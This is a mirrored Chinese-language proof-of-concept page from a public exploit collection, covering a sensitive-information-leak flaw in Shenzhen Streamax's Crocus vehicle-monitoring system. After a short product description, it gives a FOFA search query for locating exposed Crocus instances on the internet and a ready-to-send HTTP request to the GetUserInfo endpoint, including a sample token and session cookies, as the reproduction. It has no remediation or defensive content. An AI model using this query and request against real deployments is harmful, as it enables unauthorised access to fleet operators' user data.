admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 11:57:27 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/深圳市锐明技术股份有限公司/深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

33 lines
1.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞
# 一、漏洞简介
锐明技术作为一家专注于AI和视频技术的商用车智能物联AIoT解决方案提供商Crocus系统是其核心产品之一。Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术帮助商用车减少交通事故和货物丢失提高企业或车队的运营效率。通过车载摄像头、毫米波雷达等传感器实现对车辆周围环境的实时感知和监控提高驾驶安全性。利用AI技术系统能够识别车辆和行人的身份并分析驾驶员的驾驶行为及时提醒驾驶员注意潜在风险。Crocus系统能够实时监控货箱状态包括货物是否丢失、货箱是否关闭等并通过3D检测技术实现更精准的货物识别和管理。深圳市锐明技术股份有限公司Crocus系统存在敏感信息泄露漏洞
# 二、影响版本
+ Crocus系统
# 三、资产测绘
+ fofa`body="/ThirdResource/respond/respond.min.js" && title="Crocus"`
+ 特征
![1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149.png](./img/UYZbMZVovOGNg0S7/1720274332352-c9c6a280-a643-4bac-95f0-0f7942a72149-943722.png)
# 四、漏洞复现
```http
GET /Home.do?Action=GetUserInfo&Type=Get&Guid=1724206435273 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Token: d2JzczoxNzI0MjA2NDIwNzU2
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=234DBD0F52D9D798CB9931DEDA75131A; Saffron.U=VUlEPTEmVU49Y3JvY3VzJkdJRD0xNzI0MjA3NDQ5NTI2ODYmUklEPTEmTT1CTWFwJklOUz0x
X-Requested-With: XMLHttpRequest
```
![1725460117888-1de7a21d-cdd9-49fc-99de-2248636c77d1.png](./img/UYZbMZVovOGNg0S7/1725460117888-1de7a21d-cdd9-49fc-99de-2248636c77d1-789831.png)
> 更新: 2024-09-06 02:24:31
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lr4dgs05xzsvh5l3>
Reference in New Issue View Git Blame Copy Permalink